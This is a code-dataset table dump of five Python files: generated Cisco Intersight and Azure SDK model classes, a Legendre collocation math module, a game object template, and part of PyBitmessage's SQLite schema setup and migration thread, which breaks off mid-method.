ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M) |
---|---|---|
py | 7df9dfe7c3aa03fb3cb4bd2b2b287720e1754e3e | # coding: utf-8
"""
Cisco Intersight OpenAPI specification.
The Cisco Intersight OpenAPI specification.
OpenAPI spec version: 1.0.9-1461
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class HclHardwareCompatibilityProfile(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'object_type': 'str',
'driver_iso_url': 'str',
'error_code': 'str',
'id': 'str',
'os_vendor': 'str',
'os_version': 'str',
'processor_model': 'str',
'products': 'list[HclProduct]',
'server_model': 'str',
'server_revision': 'str',
'ucs_version': 'str',
'version_type': 'str'
}
attribute_map = {
'object_type': 'ObjectType',
'driver_iso_url': 'DriverIsoUrl',
'error_code': 'ErrorCode',
'id': 'Id',
'os_vendor': 'OsVendor',
'os_version': 'OsVersion',
'processor_model': 'ProcessorModel',
'products': 'Products',
'server_model': 'ServerModel',
'server_revision': 'ServerRevision',
'ucs_version': 'UcsVersion',
'version_type': 'VersionType'
}
def __init__(self, object_type=None, driver_iso_url=None, error_code='Success', id=None, os_vendor=None, os_version=None, processor_model=None, products=None, server_model=None, server_revision=None, ucs_version=None, version_type='UCSM'):
"""
HclHardwareCompatibilityProfile - a model defined in Swagger
"""
self._object_type = None
self._driver_iso_url = None
self._error_code = None
self._id = None
self._os_vendor = None
self._os_version = None
self._processor_model = None
self._products = None
self._server_model = None
self._server_revision = None
self._ucs_version = None
self._version_type = None
if object_type is not None:
self.object_type = object_type
if driver_iso_url is not None:
self.driver_iso_url = driver_iso_url
if error_code is not None:
self.error_code = error_code
if id is not None:
self.id = id
if os_vendor is not None:
self.os_vendor = os_vendor
if os_version is not None:
self.os_version = os_version
if processor_model is not None:
self.processor_model = processor_model
if products is not None:
self.products = products
if server_model is not None:
self.server_model = server_model
if server_revision is not None:
self.server_revision = server_revision
if ucs_version is not None:
self.ucs_version = ucs_version
if version_type is not None:
self.version_type = version_type
@property
def object_type(self):
"""
Gets the object_type of this HclHardwareCompatibilityProfile.
The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types.
:return: The object_type of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._object_type
@object_type.setter
def object_type(self, object_type):
"""
Sets the object_type of this HclHardwareCompatibilityProfile.
The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types.
:param object_type: The object_type of this HclHardwareCompatibilityProfile.
:type: str
"""
self._object_type = object_type
@property
def driver_iso_url(self):
"""
Gets the driver_iso_url of this HclHardwareCompatibilityProfile.
Url for the ISO with the drivers supported for the server.
:return: The driver_iso_url of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._driver_iso_url
@driver_iso_url.setter
def driver_iso_url(self, driver_iso_url):
"""
Sets the driver_iso_url of this HclHardwareCompatibilityProfile.
Url for the ISO with the drivers supported for the server.
:param driver_iso_url: The driver_iso_url of this HclHardwareCompatibilityProfile.
:type: str
"""
self._driver_iso_url = driver_iso_url
@property
def error_code(self):
"""
Gets the error_code of this HclHardwareCompatibilityProfile.
Error code indicating the compatibility status.
:return: The error_code of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._error_code
@error_code.setter
def error_code(self, error_code):
"""
Sets the error_code of this HclHardwareCompatibilityProfile.
Error code indicating the compatibility status.
:param error_code: The error_code of this HclHardwareCompatibilityProfile.
:type: str
"""
allowed_values = ["Success", "Unknown", "UnknownServer", "InvalidUcsVersion", "ProcessorNotSupported", "OSNotSupported", "OSUnknown", "UCSVersionNotSupported", "UcsVersionServerOSCombinationNotSupported", "ProductUnknown", "ProductNotSupported", "DriverNameNotSupported", "FirmwareVersionNotSupported", "DriverVersionNotSupported", "FirmwareVersionDriverVersionCombinationNotSupported", "FirmwareVersionAndDriverVersionNotSupported", "FirmwareVersionAndDriverNameNotSupported", "InternalError", "MarshallingError", "Exempted"]
if error_code not in allowed_values:
raise ValueError(
"Invalid value for `error_code` ({0}), must be one of {1}"
.format(error_code, allowed_values)
)
self._error_code = error_code
@property
def id(self):
"""
Gets the id of this HclHardwareCompatibilityProfile.
Identifier of the hardware compatibility profile.
:return: The id of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this HclHardwareCompatibilityProfile.
Identifier of the hardware compatibility profile.
:param id: The id of this HclHardwareCompatibilityProfile.
:type: str
"""
self._id = id
@property
def os_vendor(self):
"""
Gets the os_vendor of this HclHardwareCompatibilityProfile.
Vendor of the Operating System running on the server.
:return: The os_vendor of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._os_vendor
@os_vendor.setter
def os_vendor(self, os_vendor):
"""
Sets the os_vendor of this HclHardwareCompatibilityProfile.
Vendor of the Operating System running on the server.
:param os_vendor: The os_vendor of this HclHardwareCompatibilityProfile.
:type: str
"""
self._os_vendor = os_vendor
@property
def os_version(self):
"""
Gets the os_version of this HclHardwareCompatibilityProfile.
Version of the Operating System running on the server.
:return: The os_version of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._os_version
@os_version.setter
def os_version(self, os_version):
"""
Sets the os_version of this HclHardwareCompatibilityProfile.
Version of the Operating System running on the server.
:param os_version: The os_version of this HclHardwareCompatibilityProfile.
:type: str
"""
self._os_version = os_version
@property
def processor_model(self):
"""
Gets the processor_model of this HclHardwareCompatibilityProfile.
Model of the processor present in the server.
:return: The processor_model of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._processor_model
@processor_model.setter
def processor_model(self, processor_model):
"""
Sets the processor_model of this HclHardwareCompatibilityProfile.
Model of the processor present in the server.
:param processor_model: The processor_model of this HclHardwareCompatibilityProfile.
:type: str
"""
self._processor_model = processor_model
@property
def products(self):
"""
Gets the products of this HclHardwareCompatibilityProfile.
List of the products (adapters/storage controllers) for which compatibility status needs to be checked.
:return: The products of this HclHardwareCompatibilityProfile.
:rtype: list[HclProduct]
"""
return self._products
@products.setter
def products(self, products):
"""
Sets the products of this HclHardwareCompatibilityProfile.
List of the products (adapters/storage controllers) for which compatibility status needs to be checked.
:param products: The products of this HclHardwareCompatibilityProfile.
:type: list[HclProduct]
"""
self._products = products
@property
def server_model(self):
"""
Gets the server_model of this HclHardwareCompatibilityProfile.
Model of the server as returned by UCSM/CIMC XML API.
:return: The server_model of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._server_model
@server_model.setter
def server_model(self, server_model):
"""
Sets the server_model of this HclHardwareCompatibilityProfile.
Model of the server as returned by UCSM/CIMC XML API.
:param server_model: The server_model of this HclHardwareCompatibilityProfile.
:type: str
"""
self._server_model = server_model
@property
def server_revision(self):
"""
Gets the server_revision of this HclHardwareCompatibilityProfile.
Revision of the server model.
:return: The server_revision of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._server_revision
@server_revision.setter
def server_revision(self, server_revision):
"""
Sets the server_revision of this HclHardwareCompatibilityProfile.
Revision of the server model.
:param server_revision: The server_revision of this HclHardwareCompatibilityProfile.
:type: str
"""
self._server_revision = server_revision
@property
def ucs_version(self):
"""
Gets the ucs_version of this HclHardwareCompatibilityProfile.
Version of the UCS software.
:return: The ucs_version of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._ucs_version
@ucs_version.setter
def ucs_version(self, ucs_version):
"""
Sets the ucs_version of this HclHardwareCompatibilityProfile.
Version of the UCS software.
:param ucs_version: The ucs_version of this HclHardwareCompatibilityProfile.
:type: str
"""
self._ucs_version = ucs_version
@property
def version_type(self):
"""
Gets the version_type of this HclHardwareCompatibilityProfile.
Type of the UCS version indicating whether it is a UCSM release version or an IMC release.
:return: The version_type of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._version_type
@version_type.setter
def version_type(self, version_type):
"""
Sets the version_type of this HclHardwareCompatibilityProfile.
Type of the UCS version indicating whether it is a UCSM release version or an IMC release.
:param version_type: The version_type of this HclHardwareCompatibilityProfile.
:type: str
"""
allowed_values = ["UCSM", "IMC"]
if version_type not in allowed_values:
raise ValueError(
"Invalid value for `version_type` ({0}), must be one of {1}"
.format(version_type, allowed_values)
)
self._version_type = version_type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, HclHardwareCompatibilityProfile):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
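The generated model above is a plain property bag: constructor keywords go through the setters, the two enum-typed fields (`error_code`, `version_type`) are validated against `allowed_values`, and `to_dict()` walks `swagger_types` to serialize nested objects. A minimal usage sketch follows; the import path and the field values are illustrative guesses, not taken from the file itself:

```python
# Hypothetical import path; adjust to wherever the generated package actually lives.
from intersight.models.hcl_hardware_compatibility_profile import HclHardwareCompatibilityProfile

profile = HclHardwareCompatibilityProfile(
    os_vendor="Red Hat",
    os_version="7.6",
    server_model="UCSC-C220-M5SX",   # placeholder model string
    ucs_version="4.0(2f)",
    version_type="IMC",              # must be "UCSM" or "IMC", otherwise ValueError
)
print(profile.to_dict())             # dict keyed by the python-side attribute names
# profile.error_code = "bogus"       # would raise ValueError: not in allowed_values
```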
py | 7df9e00b041cb908c151a38f1b12a51f40b60696 | from enum import auto, Enum
from typing import List
import numpy as np
from numpy.polynomial.legendre import Legendre
from numpy.polynomial.polynomial import Polynomial
from scipy.interpolate import lagrange
class CollocationEnum(Enum):
"""CollocationEnum Scheme enumeration.
A collcation scheme consists of two main ingredients:
- the position of the collocation point
- the interpolating polynomial used
See: https://hal.archives-ouvertes.fr/hal-01615132/document
"""
LG = auto()
LGR = auto()
LGL = auto()
# FIXME: this is really just getting the Legendre root points, not collocation points
def get_collocation_points(
num_points: int, scheme: CollocationEnum = CollocationEnum.LGR
) -> np.ndarray:
"""Retrieve 1D collocation points for a given scheme in the interval of [-1, 1]
Note: Some methods include the end points of -1, 1, while some others don't.
"""
if not isinstance(scheme, CollocationEnum):
raise TypeError(
f"Expected scheme to be of type {CollocationEnum}, but got {type(scheme)} instead"
)
# TODO: would this be different for different schemes?
assert num_points >= 1
# TODO: perhaps we should just combine everything into a Collocation Class
if scheme == CollocationEnum.LGR:
# roots of P_{N-1} + P_N = 0, where P_k is the k-th Legendre polynomial,
# flipped around zero so that the point set includes t=1 instead of t=-1
coefficients = [0] * (num_points - 1) + [1, 1]
characteristic_polynomial = Legendre(coefficients)
# solve and flip
collocation_points = -characteristic_polynomial.roots()[::-1]
elif scheme == CollocationEnum.LG:
# roots of P_N = 0
coefficients = [0] * num_points + [1]
characteristic_polynomial = Legendre(coefficients)
collocation_points = characteristic_polynomial.roots()
elif scheme == CollocationEnum.LGL:
# roots of the derivative of P_{N-1}, plus the end points -1 and 1
coefficients = [0] * (num_points - 1) + [1]
characteristic_polynomial = Legendre(coefficients).deriv()
collocation_points = np.append(
np.insert(characteristic_polynomial.roots(), 0, -1), 1
)
else:
raise NotImplementedError(scheme)
return collocation_points
def make_lagrange_polynomial(support: np.ndarray, index: int) -> Polynomial:
"""Create the i-th lagrange polynomial"""
weights = np.zeros_like(support)
weights[index] = 1
# NOTE: scipy's lagrange returns coefficients in descending power order, which is
# the opposite of numpy's Polynomial convention, so reverse them.
coefficients = lagrange(support, weights).coef[::-1]
return Polynomial(coefficients)
def make_lagrange_basis(support: np.ndarray) -> List[Polynomial]:
"""Create a list of lagrange basis of varying order on the same support."""
return [make_lagrange_polynomial(support, index) for index in range(len(support))]
def build_lagrange_differential_matrix(
support: np.ndarray, evaluation_points: np.ndarray
) -> np.ndarray:
"""Differential matrix for computing the derivative of a lagrange polynomial using
linear matrix vector multiplication"""
lagrange_basis = make_lagrange_basis(support)
polynomials = [
lagrange_polynomial.deriv() for lagrange_polynomial in lagrange_basis
]
return np.array([p(evaluation_points) for p in polynomials]).T
def build_lagrange_integration_matrix(
support: np.ndarray, evaluation_points: np.ndarray
) -> np.ndarray:
"""Integration matrix for computing the definitive integral of a lagrange polynomial using
linear matrix vector multiplication"""
lagrange_basis = make_lagrange_basis(support)
polynomials = [
lagrange_polynomial.integ() for lagrange_polynomial in lagrange_basis
]
# NOTE: eq39, we need a definite integral, so evaluate the antiderivative at both
# ends and subtract its value at support[0] to drop the part for tau < support[0]
return np.array([p(evaluation_points) - p(support[0]) for p in polynomials]).T
|
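To see the pieces fit together: the differentiation matrix maps the values of a function on the support points to the derivative of its Lagrange interpolant at the evaluation points. A small self-check, assuming the module above is importable as `collocation` (the module name is a guess):

```python
import numpy as np

from collocation import (
    CollocationEnum,
    get_collocation_points,
    build_lagrange_differential_matrix,
)

# 5 LGR points in (-1, 1]; the LGR support adds the non-collocated end point t = -1.
tau = get_collocation_points(5, CollocationEnum.LGR)
support = np.insert(tau, 0, -1.0)

# D maps function values on the support to derivative values at the collocation points.
D = build_lagrange_differential_matrix(support, tau)
f = support ** 2                       # f(t) = t**2 is interpolated exactly
print(np.allclose(D @ f, 2 * tau))     # derivative of t**2 is 2t -> True
```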
py | 7df9e1226a64805f3703e0af4957d610068ca728 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayIPConfiguration(SubResource):
"""IP configuration of an application gateway. Currently 1 public and 1
private IP configuration is allowed.
:param id: Resource ID.
:type id: str
:param subnet: Reference of the subnet resource. A subnet from where
application gateway gets its private address.
:type subnet: :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:param provisioning_state: Provisioning state of the application gateway
subnet resource. Possible values are: 'Updating', 'Deleting', and
'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'SubResource'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, subnet=None, provisioning_state=None, name=None, etag=None):
super(ApplicationGatewayIPConfiguration, self).__init__(id=id)
self.subnet = subnet
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
|
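For context, the msrest `_attribute_map` above flattens `properties.subnet` and `properties.provisioningState` out of the ARM `properties` envelope during (de)serialization; constructing the model is just keyword arguments. A sketch, where the import path follows the docstring reference above and the resource ID is a placeholder:

```python
from azure.mgmt.network.v2016_09_01.models import (
    ApplicationGatewayIPConfiguration,
    SubResource,
)

# Bind the gateway IP configuration to an existing subnet (placeholder resource ID).
ip_config = ApplicationGatewayIPConfiguration(
    name="appGatewayIpConfig",
    subnet=SubResource(id="/subscriptions/<sub>/resourceGroups/<rg>/providers/"
                          "Microsoft.Network/virtualNetworks/<vnet>/subnets/<subnet>"),
)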
py | 7df9e239b28b5d487e6b237dc3bf415f531fbd66 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/item/shared_craftable_bug_habitat.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
py | 7df9e253ac23ade41d6e2bb68f94b94964ccd8a3 | """
sqlThread is defined here
"""
import os
import shutil # used for moving the messages.dat file
import sqlite3
import sys
import threading
import time
try:
import helper_sql
import helper_startup
import paths
import queues
import state
from addresses import encodeAddress
from bmconfigparser import config, config_ready
from debug import logger
from tr import _translate
except ImportError:
from . import helper_sql, helper_startup, paths, queues, state
from .addresses import encodeAddress
from .bmconfigparser import config, config_ready
from .debug import logger
from .tr import _translate
class sqlThread(threading.Thread):
"""A thread for all SQL operations"""
def __init__(self):
threading.Thread.__init__(self, name="SQL")
def run(self): # pylint: disable=too-many-locals, too-many-branches, too-many-statements
"""Process SQL queries from `.helper_sql.sqlSubmitQueue`"""
helper_sql.sql_available = True
config_ready.wait()
self.conn = sqlite3.connect(state.appdata + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
self.cur.execute('PRAGMA secure_delete = true')
# call create_function for encode address
self.create_function()
try:
self.cur.execute(
'''CREATE TABLE inbox (msgid blob, toaddress text, fromaddress text, subject text,'''
''' received text, message text, folder text, encodingtype int, read bool, sighash blob,'''
''' UNIQUE(msgid) ON CONFLICT REPLACE)''')
self.cur.execute(
'''CREATE TABLE sent (msgid blob, toaddress text, toripe blob, fromaddress text, subject text,'''
''' message text, ackdata blob, senttime integer, lastactiontime integer,'''
''' sleeptill integer, status text, retrynumber integer, folder text, encodingtype int, ttl int)''')
self.cur.execute(
'''CREATE TABLE subscriptions (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE addressbook (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''')
self.cur.execute(
'''CREATE TABLE blacklist (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE whitelist (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE pubkeys (address text, addressversion int, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''CREATE TABLE inventory (hash blob, objecttype int, streamnumber int, payload blob,'''
''' expirestime integer, tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO subscriptions VALUES'''
'''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''')
self.cur.execute(
'''CREATE TABLE settings (key blob, value blob, UNIQUE(key) ON CONFLICT REPLACE)''')
self.cur.execute('''INSERT INTO settings VALUES('version','11')''')
self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', (
int(time.time()),))
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
self.conn.commit()
logger.info('Created messages database file')
except Exception as err:
if str(err) == 'table inbox already exists':
logger.debug('Database file already exists.')
else:
sys.stderr.write(
'ERROR trying to create database file (messages.dat). Error message: %s\n' % str(err))
os._exit(0)
# If the settings version is equal to 2 or 3 then the
# sqlThread will modify the pubkeys table and change
# the settings version to 4.
settingsversion = config.getint(
'bitmessagesettings', 'settingsversion')
# People running earlier versions of PyBitmessage do not have the
# usedpersonally field in their pubkeys table. Let's add it.
if settingsversion == 2:
item = '''ALTER TABLE pubkeys ADD usedpersonally text DEFAULT 'no' '''
parameters = ''
self.cur.execute(item, parameters)
self.conn.commit()
settingsversion = 3
# People running earlier versions of PyBitmessage do not have the
# encodingtype field in their inbox and sent tables or the read field
# in the inbox table. Let's add them.
if settingsversion == 3:
item = '''ALTER TABLE inbox ADD encodingtype int DEFAULT '2' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''ALTER TABLE inbox ADD read bool DEFAULT '1' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''ALTER TABLE sent ADD encodingtype int DEFAULT '2' '''
parameters = ''
self.cur.execute(item, parameters)
self.conn.commit()
settingsversion = 4
config.set(
'bitmessagesettings', 'settingsversion', str(settingsversion))
config.save()
helper_startup.updateConfig()
# From now on, let us keep a 'version' embedded in the messages.dat
# file so that when we make changes to the database, the database
# version we are on can stay embedded in the messages.dat file. Let us
# check to see if the settings table exists yet.
item = '''SELECT name FROM sqlite_master WHERE type='table' AND name='settings';'''
parameters = ''
self.cur.execute(item, parameters)
if self.cur.fetchall() == []:
# The settings table doesn't exist. We need to make it.
logger.debug(
"In messages.dat database, creating new 'settings' table.")
self.cur.execute(
'''CREATE TABLE settings (key text, value blob, UNIQUE(key) ON CONFLICT REPLACE)''')
self.cur.execute('''INSERT INTO settings VALUES('version','1')''')
self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', (
int(time.time()),))
logger.debug('In messages.dat database, removing an obsolete field from the pubkeys table.')
self.cur.execute(
'''CREATE TEMPORARY TABLE pubkeys_backup(hash blob, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE);''')
self.cur.execute(
'''INSERT INTO pubkeys_backup SELECT hash, transmitdata, time, usedpersonally FROM pubkeys;''')
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys'''
''' (hash blob, transmitdata blob, time int, usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys SELECT hash, transmitdata, time, usedpersonally FROM pubkeys_backup;''')
self.cur.execute('''DROP TABLE pubkeys_backup;''')
logger.debug(
'Deleting all pubkeys from inventory.'
' They will be redownloaded and then saved with the correct times.')
self.cur.execute(
'''delete from inventory where objecttype = 'pubkey';''')
logger.debug('replacing Bitmessage announcements mailing list with a new one.')
self.cur.execute(
'''delete from subscriptions where address='BM-BbkPSZbzPwpVcYZpU4yHwf9ZPEapN5Zx' ''')
self.cur.execute(
'''INSERT INTO subscriptions VALUES'''
'''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''')
logger.debug('Committing.')
self.conn.commit()
logger.debug('Vacuuming messages.dat. You might notice that the file size gets much smaller.')
self.cur.execute(''' VACUUM ''')
# After code refactoring, the possible status values for sent messages
# have changed.
self.cur.execute(
'''update sent set status='doingmsgpow' where status='doingpow' ''')
self.cur.execute(
'''update sent set status='msgsent' where status='sentmessage' ''')
self.cur.execute(
'''update sent set status='doingpubkeypow' where status='findingpubkey' ''')
self.cur.execute(
'''update sent set status='broadcastqueued' where status='broadcastpending' ''')
self.conn.commit()
# Let's get rid of the first20bytesofencryptedmessage field in
# the inventory table.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
if int(self.cur.fetchall()[0][0]) == 2:
logger.debug(
'In messages.dat database, removing an obsolete field from'
' the inventory table.')
self.cur.execute(
'''CREATE TEMPORARY TABLE inventory_backup'''
'''(hash blob, objecttype text, streamnumber int, payload blob,'''
''' receivedtime integer, UNIQUE(hash) ON CONFLICT REPLACE);''')
self.cur.execute(
'''INSERT INTO inventory_backup SELECT hash, objecttype, streamnumber, payload, receivedtime'''
''' FROM inventory;''')
self.cur.execute('''DROP TABLE inventory''')
self.cur.execute(
'''CREATE TABLE inventory'''
''' (hash blob, objecttype text, streamnumber int, payload blob, receivedtime integer,'''
''' UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO inventory SELECT hash, objecttype, streamnumber, payload, receivedtime'''
''' FROM inventory_backup;''')
self.cur.execute('''DROP TABLE inventory_backup;''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (3,)
self.cur.execute(item, parameters)
# Add a new column to the inventory table to store tags.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 1 or currentVersion == 3:
logger.debug(
'In messages.dat database, adding tag field to'
' the inventory table.')
item = '''ALTER TABLE inventory ADD tag blob DEFAULT '' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''update settings set value=? WHERE key='version';'''
parameters = (4,)
self.cur.execute(item, parameters)
# Add a new column to the pubkeys table to store the address version.
# We're going to trash all of our pubkeys and let them be redownloaded.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 4:
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys (hash blob, addressversion int, transmitdata blob, time int,'''
'''usedpersonally text, UNIQUE(hash, addressversion) ON CONFLICT REPLACE)''')
self.cur.execute(
'''delete from inventory where objecttype = 'pubkey';''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (5,)
self.cur.execute(item, parameters)
# Add a new table: objectprocessorqueue with which to hold objects
# that have yet to be processed if the user shuts down Bitmessage.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 5:
self.cur.execute('''DROP TABLE knownnodes''')
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype text, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (6,)
self.cur.execute(item, parameters)
# changes related to protocol v3
# In table inventory and objectprocessorqueue, objecttype is now
# an integer (it was a human-friendly string previously)
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 6:
logger.debug(
'In messages.dat database, dropping and recreating'
' the inventory table.')
self.cur.execute('''DROP TABLE inventory''')
self.cur.execute(
'''CREATE TABLE inventory'''
''' (hash blob, objecttype int, streamnumber int, payload blob, expirestime integer,'''
''' tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute('''DROP TABLE objectprocessorqueue''')
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (7,)
self.cur.execute(item, parameters)
logger.debug(
'Finished dropping and recreating the inventory table.')
# The format of data stored in the pubkeys table has changed. Let's
# clear it, and the pubkeys from inventory, so that they'll
# be re-downloaded.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 7:
logger.debug(
'In messages.dat database, clearing pubkeys table'
' because the data format has been updated.')
self.cur.execute(
'''delete from inventory where objecttype = 1;''')
self.cur.execute(
'''delete from pubkeys;''')
# Any sending messages for which we *thought* that we had
# the pubkey must be rechecked.
self.cur.execute(
'''UPDATE sent SET status='msgqueued' WHERE status='doingmsgpow' or status='badkey';''')
query = '''update settings set value=? WHERE key='version';'''
parameters = (8,)
self.cur.execute(query, parameters)
logger.debug('Finished clearing currently held pubkeys.')
# Add a new column to the inbox table to store the hash of
# the message signature. We'll use this as temporary message UUID
# in order to detect duplicates.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 8:
logger.debug(
'In messages.dat database, adding sighash field to'
' the inbox table.')
item = '''ALTER TABLE inbox ADD sighash blob DEFAULT '' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''update settings set value=? WHERE key='version';'''
parameters = (9,)
self.cur.execute(item, parameters)
# We'll also need a `sleeptill` field and a `ttl` field. Also we
# can combine the pubkeyretrynumber and msgretrynumber into one.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 9:
logger.info(
'In messages.dat database, making TTL-related changes:'
' combining the pubkeyretrynumber and msgretrynumber'
' fields into the retrynumber field and adding the'
' sleeptill and ttl fields...')
self.cur.execute(
'''CREATE TEMPORARY TABLE sent_backup'''
''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,'''
''' ackdata blob, lastactiontime integer, status text, retrynumber integer,'''
''' folder text, encodingtype int)''')
self.cur.execute(
'''INSERT INTO sent_backup SELECT msgid, toaddress, toripe, fromaddress,'''
''' subject, message, ackdata, lastactiontime,'''
''' status, 0, folder, encodingtype FROM sent;''')
self.cur.execute('''DROP TABLE sent''')
self.cur.execute(
'''CREATE TABLE sent'''
''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,'''
''' ackdata blob, senttime integer, lastactiontime integer, sleeptill int, status text,'''
''' retrynumber integer, folder text, encodingtype int, ttl int)''')
self.cur.execute(
'''INSERT INTO sent SELECT msgid, toaddress, toripe, fromaddress, subject, message, ackdata,'''
''' lastactiontime, lastactiontime, 0, status, 0, folder, encodingtype, 216000 FROM sent_backup;''')
self.cur.execute('''DROP TABLE sent_backup''')
logger.info('In messages.dat database, finished making TTL-related changes.')
logger.debug('In messages.dat database, adding address field to the pubkeys table.')
# We're going to have to calculate the address for each row in the pubkeys
# table. Then we can take out the hash field.
self.cur.execute('''ALTER TABLE pubkeys ADD address text DEFAULT '' ;''')
